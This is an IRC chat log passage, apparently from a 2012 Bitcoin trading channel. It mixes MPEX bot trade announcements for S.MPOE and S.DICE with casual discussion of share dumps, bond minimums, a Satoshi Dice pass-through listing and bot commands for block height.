= 2.7126 BTC [-] Dec 17 11:52:02 [MPEX] [S.MPOE] 14179 @ 0.00062768 = 8.8999 BTC [-] Dec 17 11:57:31 [MPEX] [S.MPOE] 4321 @ 0.0006286 = 2.7162 BTC [+] Dec 17 11:57:33 [MPEX] [S.MPOE] 5950 @ 0.0006289 = 3.742 BTC [+] Dec 17 12:00:29 sup hos? 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Dec 17 12:38:21 [MPEX] [S.MPOE] 4321 @ 0.00063569 = 2.7468 BTC [-] Dec 17 12:38:22 [MPEX] [S.MPOE] 8729 @ 0.000636 = 5.5516 BTC [+] Dec 17 12:45:58 [MPEX] [S.MPOE] 4321 @ 0.00063069 = 2.7252 BTC [-] Dec 17 12:45:59 [MPEX] [S.MPOE] 16623 @ 0.00063042 = 10.4795 BTC [-] Dec 17 12:50:54 [MPEX] [S.MPOE] 4321 @ 0.00063064 = 2.725 BTC [+] Dec 17 12:50:56 [MPEX] [S.MPOE] 2099 @ 0.00063042 = 1.3233 BTC [-] Dec 17 12:50:57 [MPEX] [S.MPOE] 480 @ 0.00062768 = 0.3013 BTC [-] Dec 17 13:04:46 [MPEX] [S.MPOE] 4321 @ 0.00063566 = 2.7467 BTC [+] Dec 17 13:04:47 [MPEX] [S.MPOE] 10829 @ 0.000636 = 6.8872 BTC [+] Dec 17 13:18:23 [MPEX] [S.MPOE] 4321 @ 0.0006351 = 2.7443 BTC [-] Dec 17 13:18:24 [MPEX] [S.MPOE] 4822 @ 0.00063509 = 3.0624 BTC [-] Dec 17 13:18:26 [MPEX] [S.MPOE] 340 @ 0.00062768 = 0.2134 BTC [-] Dec 17 13:18:27 [MPEX] [S.MPOE] 13467 @ 0.00062642 = 8.436 BTC [-] Dec 17 13:19:27 [MPEX] [S.MPOE] 3300 @ 0.00063567 = 2.0977 BTC [+] Dec 17 13:31:24 [MPEX] [S.MPOE] 7133 @ 0.00062642 = 4.4683 BTC [-] Dec 17 13:31:25 [MPEX] [S.MPOE] 7900 @ 0.00062309 = 4.9224 BTC [-] Dec 17 13:31:27 [MPEX] [S.MPOE] 6217 @ 0.00062251 = 3.8701 BTC [-] Dec 17 13:32:01 [MPEX] [S.MPOE] 1883 @ 0.00062251 = 1.1722 BTC [-] Dec 17 13:32:03 [MPEX] [S.MPOE] 18097 @ 0.0006221 = 11.2581 BTC [-] Dec 17 13:32:04 [MPEX] [S.MPOE] 7500 @ 0.00062128 = 4.6596 BTC [-] Dec 17 13:32:05 [MPEX] [S.MPOE] 5320 @ 0.00062089 = 3.3031 BTC [-] Dec 17 13:33:25 [MPEX] [S.MPOE] 1021 @ 0.00063567 = 0.649 BTC [+] Dec 17 13:33:26 [MPEX] [S.MPOE] 13541 @ 0.00063583 = 8.6098 BTC [+] Dec 17 13:37:12 [MPEX] [S.MPOE] 4321 @ 0.00062109 = 2.6837 BTC [-] Dec 17 13:37:14 [MPEX] [S.MPOE] 13508 @ 0.00062089 = 8.387 BTC [-] Dec 17 13:40:35 [MPEX] [S.MPOE] 10272 @ 0.00062089 = 6.3778 BTC [-] Dec 17 13:40:36 [MPEX] [S.MPOE] 6960 @ 0.00062042 = 4.3181 BTC [-] Dec 17 13:41:42 [MPEX] [S.MPOE] 4321 @ 0.0006358 = 2.7473 BTC [+] Dec 17 13:41:44 [MPEX] [S.MPOE] 659 @ 0.00063583 = 0.419 BTC [+] Dec 17 13:41:45 [MPEX] [S.MPOE] 11170 @ 0.000636 = 7.1041 BTC [+] Dec 17 13:48:59 [MPEX] [S.MPOE] 4321 @ 0.0006357 = 2.7469 BTC [-] Dec 17 13:52:43 [MPEX] [S.MPOE] 7007 @ 0.000636 = 4.4565 BTC [+] Dec 17 13:57:55 [MPEX] [S.MPOE] 10350 @ 0.000636 = 6.5826 BTC [+] Dec 17 13:58:21 this is nice. Mpex has now 2 stocks, that get trades. Good job :) Dec 17 14:01:19 [MPEX] [S.MPOE] 12714 @ 0.00063571 = 8.0824 BTC [-] Dec 17 14:07:33 [MPEX] [S.MPOE] 4321 @ 0.00062053 = 2.6813 BTC [-] Dec 17 14:07:35 [MPEX] [S.MPOE] 12499 @ 0.00062042 = 7.7546 BTC [-] Dec 17 14:13:49 [MPEX] [S.MPOE] 5665 @ 0.00061785 = 3.5001 BTC [-] Dec 17 14:21:59 [MPEX] [S.MPOE] 4321 @ 0.00063372 = 2.7383 BTC [+] Dec 17 14:22:01 [MPEX] [S.MPOE] 7972 @ 0.00063403 = 5.0545 BTC [+] Dec 17 14:24:37 [MPEX] [S.MPOE] 19657 @ 0.00063582 = 12.4983 BTC [+] Dec 17 14:24:39 [MPEX] [S.MPOE] 843 @ 0.00063155 = 0.5324 BTC [-] Dec 17 14:52:07 [MPEX] [S.MPOE] 4321 @ 0.00063596 = 2.748 BTC [+] Dec 17 14:52:09 [MPEX] [S.MPOE] 5659 @ 0.000636 = 3.5991 BTC [+] Dec 17 14:52:09 [MPEX] [S.MPOE] 9500 @ 0.00063601 = 6.0421 BTC [+] Dec 17 14:52:10 [MPEX] [S.MPOE] 2470 @ 0.00063603 = 1.571 BTC [+] Dec 17 14:58:39 [MPEX] [S.MPOE] 5407 @ 0.00063603 = 3.439 BTC [+] Dec 17 15:06:49 [MPEX] [S.MPOE] 4321 @ 0.00063164 = 2.7293 BTC [-] Dec 17 15:06:50 [MPEX] [S.MPOE] 8192 @ 0.00063155 = 5.1737 BTC [-] Dec 17 15:06:51 [MPEX] [S.MPOE] 8887 @ 0.0006154 = 5.4691 BTC [-] Dec 17 15:19:32 [MPEX] [S.MPOE] 4321 @ 0.00063587 = 2.7476 BTC [+] Dec 17 15:19:32 [MPEX] [S.MPOE] 10523 @ 0.00063603 = 6.6929 BTC [+] Dec 17 15:19:34 [MPEX] [S.MPOE] 10206 @ 0.0006361 = 6.492 BTC [+] Dec 17 15:30:22 [MPEX] [S.MPOE] 4321 @ 0.00061544 = 2.6593 BTC [-] Dec 17 15:30:23 [MPEX] [S.MPOE] 12288 @ 0.0006154 = 7.562 BTC [-] Dec 17 15:30:25 [MPEX] [S.MPOE] 19691 @ 0.00061423 = 12.0948 BTC [-] Dec 17 15:48:11 ;;ticker Dec 17 15:48:12 BTCUSD ticker | Best bid: 13.15754, Best ask: 13.23870, Bid-ask spread: 0.08116, Last trade: 13.15754, 24 hour volume: 78551.08864463, 24 hour low: 12.74919, 24 hour high: 13.60000, 24 hour vwap: 13.22707 Dec 17 15:49:04 [MPEX] [S.MPOE] 4321 @ 0.00063605 = 2.7484 BTC [+] Dec 17 15:49:06 [MPEX] [S.MPOE] 8174 @ 0.0006361 = 5.1995 BTC [+] Dec 17 16:03:25 [MPEX] [S.MPOE] 4321 @ 0.00062819 = 2.7144 BTC [-] Dec 17 16:03:26 [MPEX] [S.MPOE] 12279 @ 0.00062811 = 7.7126 BTC [-] Dec 17 16:07:36 [MPEX] [S.DICE] 1800 @ 0.00348748 = 6.2775 BTC [+] Dec 17 16:07:37 [MPEX] [S.DICE] 2800 @ 0.00351386 = 9.8388 BTC [+] Dec 17 16:16:05 [MPEX] [S.MPOE] 2121 @ 0.00062811 = 1.3322 BTC [-] Dec 17 16:34:17 [MPEX] [S.MPOE] 5900 @ 0.00062294 = 3.6753 BTC [-] Dec 17 16:37:21 time travel Dec 17 16:37:46 ;;ticker Dec 17 16:37:47 BTCUSD ticker | Best bid: 13.22102, Best ask: 13.22103, Bid-ask spread: 0.00001, Last trade: 13.22102, 24 hour volume: 82987.55553313, 24 hour low: 12.74919, 24 hour high: 13.60000, 24 hour vwap: 13.23176 Dec 17 16:38:48 [MPEX] [S.MPOE] 10888 @ 0.00062294 = 6.7826 BTC [-] Dec 17 16:42:25 [MPEX] [S.MPOE] 4321 @ 0.00062164 = 2.6861 BTC [-] Dec 17 16:42:26 [MPEX] [S.MPOE] 7679 @ 0.0006216 = 4.7733 BTC [-] Dec 17 16:43:22 [MPEX] [S.MPOE] 4321 @ 0.00062289 = 2.6915 BTC [+] Dec 17 16:43:24 [MPEX] [S.MPOE] 41 @ 0.00062294 = 0.0255 BTC [+] Dec 17 16:50:25 [MPEX] [S.MPOE] 3088 @ 0.00062705 = 1.9363 BTC [+] Dec 17 16:50:27 [MPEX] [S.MPOE] 4321 @ 0.00062162 = 2.686 BTC [-] Dec 17 16:50:28 [MPEX] [S.MPOE] 18121 @ 0.0006216 = 11.264 BTC [-] Dec 17 16:54:36 http://trilema.com/2012/the-btc-million/ Dec 17 16:54:41 someone put that up on reddit Dec 17 16:57:16 i'll just pm it to inaba Dec 17 16:57:43 [MPEX] [S.MPOE] 4321 @ 0.00062802 = 2.7137 BTC [+] Dec 17 16:57:45 [MPEX] [S.MPOE] 11671 @ 0.00062835 = 7.3335 BTC [+] Dec 17 16:57:46 [MPEX] [S.MPOE] 2456 @ 0.0006287 = 1.5441 BTC [+] Dec 17 17:03:34 pigeons lol Dec 17 17:03:48 [MPEX] [S.MPOE] 4321 @ 0.00062855 = 2.716 BTC [-] Dec 17 17:03:48 [MPEX] [S.MPOE] 16344 @ 0.0006287 = 10.2755 BTC [+] Dec 17 17:03:50 [MPEX] [S.MPOE] 5270 @ 0.0006361 = 3.3522 BTC [+] Dec 17 17:03:53 EskimoBob, you nailed it: https://bitcointalk.org/index.php?topic=102181.msg1405017#msg1405017 Dec 17 17:04:16 oh, hello mircea_popescu, we are perpetrating something with Ukto Dec 17 17:04:30 heya Dec 17 17:04:34 >:P~ Dec 17 17:04:39 and want to know, what is minimal investment into MPOE bonds Dec 17 17:04:40 ? Dec 17 17:06:40 50 or 100btc? Dec 17 17:07:12 usagi : "Through a mathematical trick I have been able to" Dec 17 17:07:16 you know you gotta read it. Dec 17 17:07:18 jurov 100 Dec 17 17:08:04 and January ones can be bought until December 29 midnight, yes? Dec 17 17:08:27 ya Dec 17 17:11:25 hey mircea_popescu Dec 17 17:11:28 heya Dec 17 17:11:33 didnt smickles's asset on glbse make some good profit? Dec 17 17:12:06 pretty good yea Dec 17 17:12:09 and one of the arb bot guys.. Dec 17 17:12:17 pr "I can't actually think of one that did make money, off the top of my head. Which? Dec 17 17:12:25 course most glbse idiots were too busy buying the scams to put much money in Dec 17 17:12:27 mebbe she was just trolling Dec 17 17:12:32 true that Dec 17 17:12:42 a right, the sc2m thing did make money huh Dec 17 17:12:42 mpoe-pr trolling? Dec 17 17:13:06 mircea_popescu: where is this post by usagi? is it the one jurov just gave us? Dec 17 17:13:43 lmao ahahaha Dec 17 17:13:49 Look at how btct.co, litecoinglobal.com, bitfunder.com, cryptostocks.com and so on get their clients. Dec 17 17:13:59 [MPEX] [S.MPOE] 4321 @ 0.00062806 = 2.7138 BTC [-] Dec 17 17:14:00 [MPEX] [S.MPOE] 8979 @ 0.00062786 = 5.6376 BTC [-] Dec 17 17:14:21 thestringpuller no, it was one of his numerously amusing threads, something about a liquidator Dec 17 17:15:14 I wouldn't touch anything floated by usage through a 10-element proxy chain. Dec 17 17:15:17 usagi Dec 17 17:15:39 mircea_popescu: what, you dont like bribery? Dec 17 17:15:40 ;) Dec 17 17:15:58 eerrr "Promotions" >,> Dec 17 17:16:00 <,< Dec 17 17:16:17 Ukto i have no problem with it, just, the guy is so completely confused he's amusing. Dec 17 17:19:07 [MPEX] [S.DICE] 4500 @ 0.00369 = 16.605 BTC [+] Dec 17 17:31:34 mircea_popescu: could you find that thread perhaps? when you have time that is. Dec 17 17:32:24 mircea_popescu: my investors would rather build a commodity market instead of strictly futures physical delivery so that will be added to the plan. Dec 17 17:36:08 thestringpuller https://bitcointalk.org/index.php?topic=126560.msg1404972#msg1404972 Dec 17 17:37:00 [MPEX] [S.MPOE] 9521 @ 0.00062786 = 5.9779 BTC [-] Dec 17 17:37:01 [MPEX] [S.MPOE] 7486 @ 0.00062512 = 4.6796 BTC [-] Dec 17 17:37:33 ty Dec 17 17:38:06 http://www.foxnews.com/world/2012/12/17/australian-woman-gets-worker-compensation-benefits-for-injury-during-sex-on/ Dec 17 17:39:49 [MPEX] [S.DICE] 7800 @ 0.00354739 = 27.6696 BTC [-] Dec 17 17:39:50 [MPEX] [S.DICE] 3500 @ 0.00348391 = 12.1937 BTC [-] Dec 17 17:39:50 [MPEX] [S.DICE] 3010 @ 0.00335248 = 10.091 BTC [-] Dec 17 17:39:52 [MPEX] [S.DICE] 3000 @ 0.00333474 = 10.0042 BTC [-] Dec 17 17:39:53 [MPEX] [S.DICE] 4250 @ 0.00333086 = 14.1562 BTC [-] Dec 17 17:39:54 [MPEX] [S.DICE] 1900 @ 0.00332979 = 6.3266 BTC [-] Dec 17 17:39:55 [MPEX] [S.DICE] 5302 @ 0.00330789 = 17.5384 BTC [-] Dec 17 17:39:56 [MPEX] [S.DICE] 4400 @ 0.00327318 = 14.402 BTC [-] Dec 17 17:39:57 [MPEX] [S.DICE] 4000 @ 0.00324542 = 12.9817 BTC [-] Dec 17 17:39:58 [MPEX] [S.DICE] 500 @ 0.00320002 = 1.6 BTC [-] Dec 17 17:39:59 [MPEX] [S.DICE] 12338 @ 0.00320001 = 39.4817 BTC [-] Dec 17 17:40:57 [MPEX] [S.DICE] 5443 @ 0.00320001 = 17.4177 BTC [-] Dec 17 17:40:59 [MPEX] [S.DICE] 1000 @ 0.0032 = 3.2 BTC [-] Dec 17 17:40:59 [MPEX] [S.DICE] 2855 @ 0.00319749 = 9.1288 BTC [-] Dec 17 17:41:00 [MPEX] [S.DICE] 2952 @ 0.0031637 = 9.3392 BTC [-] Dec 17 17:41:02 [MPEX] [S.DICE] 5950 @ 0.0030817 = 18.3361 BTC [-] Dec 17 17:41:03 [MPEX] [S.DICE] 454 @ 0.00180001 = 0.8172 BTC [-] Dec 17 17:41:04 [MPEX] [S.DICE] 6346 @ 0.0018 = 11.4228 BTC [-] Dec 17 17:41:32 wow Dec 17 17:41:47 man Dec 17 17:41:54 someone keeps gifting it Dec 17 17:41:58 i wonder, does somebody figure this is some sort of attack or something ? Dec 17 17:42:05 why would you sell that low? Dec 17 17:42:15 no clue. Dec 17 17:42:32 what is happening Dec 17 17:42:33 the ipo tier one was .003 correct? Dec 17 17:43:05 32 34 37 Dec 17 17:43:06 some people can't figure out the user-friendliness of mpex so they place a market order? Dec 17 17:43:35 pigeons that is also possible. Dec 17 17:46:05 reading the stuff romanians post in btctalk. lulzy. Dec 17 17:48:45 FFS, another S.DICE dump to .0018 Dec 17 17:49:42 bugpowder missed winning the sdice sell off lotto 3 times already lolol Dec 17 17:49:43 you miss all the good stuff Dec 17 17:49:53 wait this is the 3rd ? i knew of one yest Dec 17 17:50:13 [MPEX] [S.DICE] 270635 @ 0.00369 = 998.6432 BTC [+] Dec 17 17:50:38 !ticker s.dice Dec 17 17:50:40 [MPEX:S.DICE] 1day: 0.0018 / 0.00339706 / 0.003695 (1130674 shares, 3,840.97 BTC), 30day: 0.0018 / 0.00338786 / 0.003695 (5977543 shares, 20,251.09 BTC) Dec 17 17:52:32 [MPEX] [S.MPOE] 4321 @ 0.00062169 = 2.6863 BTC [-] Dec 17 17:52:34 [MPEX] [S.MPOE] 6405 @ 0.0006216 = 3.9813 BTC [-] Dec 17 17:52:35 [MPEX] [S.MPOE] 1300 @ 0.00061737 = 0.8026 BTC [-] Dec 17 17:52:36 [MPEX] [S.MPOE] 2974 @ 0.00061695 = 1.8348 BTC [-] Dec 17 17:53:52 I don't have any capital left Dec 17 17:53:56 to place bids Dec 17 17:54:58 Only 2 dumps I think http://live.coinbr.com/?mpsic=S.DICE Dec 17 17:56:09 Bugpowder sell house, sell wife Dec 17 17:56:12 buy stocks! Dec 17 17:56:21 I have plenty of capital. Dec 17 17:56:27 Just not in bitcoins Dec 17 17:56:34 I am not allowed to buy more coins Dec 17 17:56:38 Hence Dec 17 17:56:46 I must invest them to make more Dec 17 17:56:50 lol Dec 17 17:56:54 who'se rules ? Dec 17 17:56:58 Wife Dec 17 17:57:04 how much for the little girl ? Dec 17 17:57:24 No gipsy Dec 17 17:57:41 lol Dec 17 17:58:16 The big question is Dec 17 17:58:23 will Tier 3 hold Dec 17 17:58:29 till divvy payment Dec 17 17:59:09 still two weeks + to go Dec 17 17:59:10 [MPEX] [S.MPOE] 4321 @ 0.00061706 = 2.6663 BTC [+] Dec 17 17:59:11 [MPEX] [S.MPOE] 7106 @ 0.00061695 = 4.384 BTC [-] Dec 17 17:59:13 [MPEX] [S.MPOE] 14900 @ 0.00061479 = 9.1604 BTC [-] Dec 17 17:59:14 [MPEX] [S.MPOE] 6473 @ 0.00061423 = 3.9759 BTC [-] Dec 17 17:59:19 if it doesn't tho, it could be mayhem Dec 17 17:59:38 Yah. I did not expect T2 to go this early in the div cycle Dec 17 17:59:43 mpex passes 1mn and 2mn mkt cap in the same month Dec 17 18:00:08 I already fucked up the MPOE trade Dec 17 18:00:13 o ? Dec 17 18:00:13 not going to bail on S.DICE Dec 17 18:00:16 lol Dec 17 18:00:35 i tell you tho, this is starting to emerge, my trading hat is humming in delight Dec 17 18:00:37 wonderful times. Dec 17 18:00:48 (.00063-.00038)*1280000 Dec 17 18:00:59 ;;calc (.00063-.00038)*1280000 Dec 17 18:01:00 320 Dec 17 18:01:12 ;;calc (.00063-.00038)*1280000 Dec 17 18:01:13 320 Dec 17 18:01:18 a not so bad, for some reason i had it in my head you missed out on 1.5-2k btc Dec 17 18:01:32 I was not all in Dec 17 18:01:52 course s.mpoe is trading more like 61 Dec 17 18:05:55 http://www.reddit.com/r/Bitcoin/comments/14w2wo/come_get_some_free_bitcoins/ Dec 17 18:05:59 thing gets ~800 comments Dec 17 18:06:04 total 1 btc in tips Dec 17 18:06:10 it's remarkable how cheap the internet is. Dec 17 18:06:23 (which obviously means worthless) Dec 17 18:10:43 [MPEX] [X.ALCG] 170 @ 0.09331194 = 15.863 BTC [-] Dec 17 18:19:51 [MPEX] [S.MPOE] 4321 @ 0.00062324 = 2.693 BTC [+] Dec 17 18:19:53 [MPEX] [S.MPOE] 2801 @ 0.00062342 = 1.7462 BTC [+] Dec 17 18:19:54 [MPEX] [S.MPOE] 3828 @ 0.00063252 = 2.4213 BTC [+] Dec 17 18:27:39 [MPEX] [X.MHGG] 100 @ 0.25889911 = 25.8899 BTC Dec 17 18:32:52 [MPEX] [S.MPOE] 4321 @ 0.00061732 = 2.6674 BTC [-] Dec 17 18:34:04 https://bitfunder.com/asset/G.SDICE <-- Satoshi Dice passthrough by Gamma SatoshiDice Fund (DeaDTerra) now online and trading Dec 17 18:39:28 [MPEX] [S.MPOE] 14329 @ 0.00061725 = 8.8446 BTC [-] Dec 17 18:40:34 oh it was me who bought the dics cheap, from old orders Dec 17 18:40:50 some of it Dec 17 18:49:23 ukto did you bribe deadterra Dec 17 18:49:45 no, he's using both BF and btct Dec 17 18:49:49 when burnside gets him set up Dec 17 18:50:03 and letting shareholders decide which they want via the claim process Dec 17 18:50:37 so far more than 9 shrehodlers have claimed, BF has got the majority. Dec 17 18:50:54 but thats prolly the last I will mention of such things >,> Dec 17 18:50:57 might be taken the wrong way Dec 17 18:56:23 [MPEX] [S.MPOE] 8911 @ 0.0006171 = 5.499 BTC [-] Dec 17 19:01:02 lol wd Dec 17 19:01:38 Ukto what's g ? Dec 17 19:03:42 Gamma Dec 17 19:03:54 what terra calls it Dec 17 19:04:08 Gamma SatoshiDice Pass Through Dec 17 19:04:20 might have him rename it to G.SDICEPT Dec 17 19:04:22 bah that's S.DICE.GAMMA or w/e Dec 17 19:04:30 lol Dec 17 19:04:40 mine is doing 'group'.(name) Dec 17 19:04:47 'group'.'name' Dec 17 19:04:52 what's group ? Dec 17 19:04:58 so if can be G.SBLAH Dec 17 19:05:04 or w/e if he does more assets Dec 17 19:05:26 http://jcph.am/2012/12/17/tragedy-as-entertainment/ Dec 17 19:05:29 current events Dec 17 19:05:38 so if you were to be an issue for say 4 things, you could name them all MP.(name) or whatever Dec 17 19:06:53 jcpham good ppint. Dec 17 19:07:09 it's the best point Dec 17 19:07:34 "News" - "TRAGEDY AS ENTERTAINMENT" Dec 17 19:07:35 :P Dec 17 19:07:50 i'm not trying to be offensive, i swear Dec 17 19:08:56 aha! Dec 17 19:08:57 http://www.reddit.com/r/Bitcoin/comments/14zxqr/mpex_over_1_million_btc_total_market_cap/ Dec 17 19:08:57 i am serious Dec 17 19:09:04 thats why I dont pay too much to the news Dec 17 19:09:13 mircea_popescu: plugger. you already pasted that :P Dec 17 19:09:17 i did ? Dec 17 19:09:18 its nifty tho Dec 17 19:09:25 oooh Dec 17 19:09:26 reddit Dec 17 19:09:27 my bad Dec 17 19:09:32 see, the bounty of social media Dec 17 19:09:36 you can plug crap fifty times Dec 17 19:09:56 tho tbh i think this is pretty major. Dec 17 19:10:12 [MPEX] [S.MPOE] 7400 @ 0.00061725 = 4.5677 BTC [+] Dec 17 19:10:59 OneFixt actually come to think about it, maybe that's what the guy selling s.dice down to 18 was doing Dec 17 19:11:22 can i borrow some shares"? =) Dec 17 19:11:25 sure. Dec 17 19:12:54 then again, you thought they were too expensive when they were doing 20ish iirc. Dec 17 19:13:08 sure, but i wouldn't have acted on it back then Dec 17 19:13:24 markets can be too expensive or too cheap for longer than most of us can stay solvent Dec 17 19:15:29 mircea_popescu: would you allow me to run decentralized commodities on mpex? if i get a plan in order Dec 17 19:16:57 thestringpuller depends what exactly that means Dec 17 19:17:08 OneFixt that's for sure. Dec 17 19:17:35 i want to do procurement contracts Dec 17 19:19:11 im having analysis run on supply prices for like cocoa and wheat and other things from small local farms Dec 17 19:19:23 even soy but soy is regulated... Dec 17 19:19:31 monsanto.... Dec 17 19:20:09 that wasn't very clear Dec 17 19:20:42 im on a mobile Dec 17 19:20:48 i apologize Dec 17 19:20:53 np Dec 17 19:20:53 OneFixt: I have shares you can borrow :) Dec 17 19:20:54 will you be around later? Dec 17 19:20:59 yup Dec 17 19:21:08 hehe, i'm thinking about it Dec 17 19:21:28 smickles: put what you're holding for me into s.mpoe and hold Dec 17 19:21:39 yawn ... James is still compiling the lists Dec 17 19:21:43 lock me out from selling it until february Dec 17 19:21:51 this will be over soon Dec 17 19:21:57 ;;ident thestringpuller Dec 17 19:21:58 Nick 'thestringpuller', with hostmask 'thestringpuller!~leflor@99-39-98-185.lightspeed.tukrga.sbcglobal.net', is not identified. Dec 17 19:22:03 who's james ? Dec 17 19:22:09 thestringpuller: ident first ;) Dec 17 19:22:15 i will ident this evening, lol Dec 17 19:22:20 i love ot smickles Dec 17 19:22:26 best btc broker EVAR Dec 17 19:23:23 thestringpuller he's made me plenty of money. Dec 17 19:23:53 [MPEX] [S.MPOE] 6241 @ 0.00061896 = 3.8629 BTC [+] Dec 17 19:23:55 [MPEX] [S.MPOE] 9893 @ 0.0006171 = 6.105 BTC [-] Dec 17 19:23:55 [MPEX] [S.MPOE] 4936 @ 0.00061423 = 3.0318 BTC [-] Dec 17 19:23:56 [MPEX] [S.MPOE] 1230 @ 0.00061337 = 0.7544 BTC [-] Dec 17 19:24:14 aww man, you're buying the wrong way. Dec 17 19:25:21 anyway, onefixt gave me an interesting idea. Dec 17 19:36:02 thestringpuller: just in case it's actually you, I'll reserve a price of 0.00061896 Dec 17 19:38:26 how does this reserve price trick work ? Dec 17 19:40:01 I guarantee him shares at a price of 0.00061896 in the amount his balance on account will allow Dec 17 19:40:15 cause he has shares on hand Dec 17 19:40:31 he will likely just assign those shares to me at said price Dec 17 19:40:33 that way, if the price skyrockets, thestringpuller doesn't lose out just 'cause he can't ident right now Dec 17 19:41:51 o i c Dec 17 19:41:56 nice. Dec 17 19:43:24 brb Dec 17 19:43:28 [MPEX] [S.MPOE] 22100 @ 0.00061337 = 13.5555 BTC [-] Dec 17 19:44:31 [MPEX] [S.MPOE] 4178 @ 0.00062313 = 2.6034 BTC [+] Dec 17 19:45:42 [MPEX] [S.DICE] 3819 @ 0.00348764 = 13.3193 BTC [-] Dec 17 19:45:42 [MPEX] [S.DICE] 224865 @ 0.00369 = 829.7519 BTC [+] Dec 17 19:45:44 [MPEX] [S.DICE] 160576 @ 0.003695 = 593.3283 BTC [+] Dec 17 19:45:45 [MPEX] [S.DICE] 10740 @ 0.0037 = 39.738 BTC [+] Dec 17 19:45:59 so it's at .0037 now? Dec 17 19:47:20 Dec 17 06:25:18 oh my Dec 17 19:47:20 Dec 17 06:25:38 lol i guess everyone can now book the 3 / 34 gain Dec 17 19:49:40 *cue mothership docking clip* Dec 17 19:54:32 ding ding ding clonk Dec 17 19:55:34 [MPEX] [S.MPOE] 4321 @ 0.00061791 = 2.67 BTC [-] Dec 17 19:55:35 [MPEX] [S.MPOE] 14679 @ 0.00061819 = 9.0744 BTC [+] Dec 17 20:00:05 HORY SHIT Dec 17 20:00:53 I gotta say... I am feeling really fucking good about my S.DICE holdings Dec 17 20:01:18 fucking good? so.. better than sex? Dec 17 20:06:02 [MPEX] [S.MPOE] 4321 @ 0.00061354 = 2.6511 BTC [-] Dec 17 20:06:03 [MPEX] [S.MPOE] 1070 @ 0.00061337 = 0.6563 BTC [-] Dec 17 20:06:05 [MPEX] [S.MPOE] 3659 @ 0.00061233 = 2.2405 BTC [-] Dec 17 20:06:40 Yay, I got my Sdice pass-through shares claimed on Bitfunder. Now if I could just sell them on mpex Dec 17 20:06:52 < Bugpowder> I gotta say... I am feeling really fucking good about my S.DICE holdings << I gotta say... I'm feeling really fucking good about mistyping a command and buying 50btc of S.DICE a while ago Dec 17 20:07:33 that said, I hope to never transpose the price and the amount on a command again Dec 17 20:08:24 Doffx, deadterra insinuated this is possible, ask him directly Dec 17 20:08:47 oh you already claimed them Dec 17 20:08:54 oh Doffx ! Dec 17 20:08:59 Yeah, was I not supposed to> Dec 17 20:09:05 can you prove that you control an address for me :) Dec 17 20:09:14 Yeah Dec 17 20:10:27 why is sdice so high? are the jan divs gonna be nuts? Dec 17 20:12:01 high Dec 17 20:12:04 4.5% Dec 17 20:12:21 4.5% dividends? Dec 17 20:12:36 from the acitivity in the first 16days alone Dec 17 20:12:41 heh, yeah, I'm sure some people are preparing to short after divs are paid Dec 17 20:12:49 lol Dec 17 20:12:49 Currntly up 14,500 coins Dec 17 20:12:54 gotcha Dec 17 20:13:24 what's the current block number for the bitcoin blockchain? Dec 17 20:13:29 212404? Dec 17 20:13:35 mpoe seems like its as stable as a bond Dec 17 20:13:40 ;;bc Dec 17 20:13:40 Error: "bc" is not a valid command. Dec 17 20:13:57 whats the command Dec 17 20:14:10 ;;help bc,sincelastblock Dec 17 20:14:10 (bc,sincelastblock ) -- Alias for "echo Time since last block: [elapsed [math calc [time %s] - [re "m/[0-9\.]{2,}/" [re m/time.*,/ [web fetch [format concat http://blockexplorer.com/rawblock/ [web fetch http://blockexplorer.com/q/latesthash]]]]]]]". Dec 17 20:14:16 ;;calc 14500/100000000/.0037 Dec 17 20:14:16 0.0391891891892 Dec 17 20:14:18 ;;bc,sincelastblock Dec 17 20:14:19 Time since last block: 1 day, 6 hours, 8 minutes, and 11 seconds Dec 17 20:14:28 ;;bc,lastblock Dec 17 20:14:29 Error: "bc,lastblock" is not a valid command. Dec 17 20:14:33 woah, long form tslb Dec 17 20:14:35 ;;tslb Dec 17 20:14:36 i'm questioning the validity of the bot's data Dec 17 20:14:36 ;;bc,count Dec 17 20:14:37 Error: "bc,count" is not a valid command. Dec 17 20:14:38 Time since last block: 1 minute and 34 seconds Dec 17 20:14:44 lol Dec 17 20:15:00 ;;bc,blocks Dec 17 20:15:01 212402 Dec 17 20:15:19 iz: i've never seen the bc,lastblock but ;;tslb seems to work Dec 17 20:15:24 this is the latest block on block explorer: http://blockexplorer.com/b/212404 Dec 17 20:15:33 Ill have to see if Deadterra can still buy those shares Dec 17 20:15:34 the timestamp is 2012-12-16 13:04:49 in UTC and my computer says today is Mon Dec 17 18:10:04 UTC 2012 Dec 17 20:15:37 err sell for me Dec 17 20:15:52 smickles: is tslb really working? or maybe that is broken Dec 17 20:16:04 cirrent block is 212552 Dec 17 20:16:11 okay, thank you mircea_popescu Dec 17 20:16:19 exactly the info i needed Dec 17 20:16:26 its broked Dec 17 20:16:29 lol Dec 17 20:16:30 iz: tslb seems to be in sync with blockchain and my local machine Dec 17 20:16:57 Doffx i would imagine you can be delivered shares no ? Dec 17 20:16:59 mircea_popescu: actually, it's 212553 Dec 17 20:17:09 even as of the time of your writing Dec 17 20:17:33 I have them on bitfunder now, I really have no clue what my options are. Dec 17 20:17:55 smickles :p Dec 17 20:18:43 ;;tslb Dec 17 20:18:45 Time since last block: 29 seconds Dec 17 20:18:58 yeah, tslb works fine, it seems Dec 17 20:21:30 you know smickles that icon really does make the bottle look like a dildo Dec 17 20:23:24 Oh cool someone bought some of my shares already Dec 17 20:23:41 quite the arbitrage hole there Dec 17 20:23:43 Where is the bitfunder bot? Dec 17 20:24:04 i guess someone will end up making a share transfer agreemend and end up unwinding most of the passthrough huh Dec 17 20:24:30 [MPEX] [S.MPOE] 143 @ 0.00061817 = 0.0884 BTC [+] Dec 17 20:24:30 [MPEX] [S.MPOE] 5725 @ 0.00061819 = 3.5391 BTC [+] Dec 17 20:24:31 [MPEX] [S.MPOE] 7549 @ 0.00062348 = 4.7067 BTC [+] Dec 17 20:27:36 [MPEX] [S.DICE] 3200 @ 0.00365174 = 11.6856 BTC [-] Dec 17 20:27:37 [MPEX] [S.DICE] 3000 @ 0.00340932 = 10.228 BTC [-] Dec 17 20:27:39 [MPEX] [S.DICE] 3592 @ 0.00340931 = 12.2462 BTC [-] Dec 17 20:27:40 [MPEX] [S.DICE] 50000 @ 0.00320001 = 160.0005 BTC [-] Dec 17 20:27:41 [MPEX] [S.DICE] 5000 @ 0.0032 = 16 BTC [-] Dec 17 20:27:42 [MPEX] [S.DICE] 208 @ 0.00180002 = 0.3744 BTC [-] Dec 17 20:28:02 mootherfucker Dec 17 20:29:13 Haha, I figured that might happen. Dec 17 20:29:26 heh Dec 17 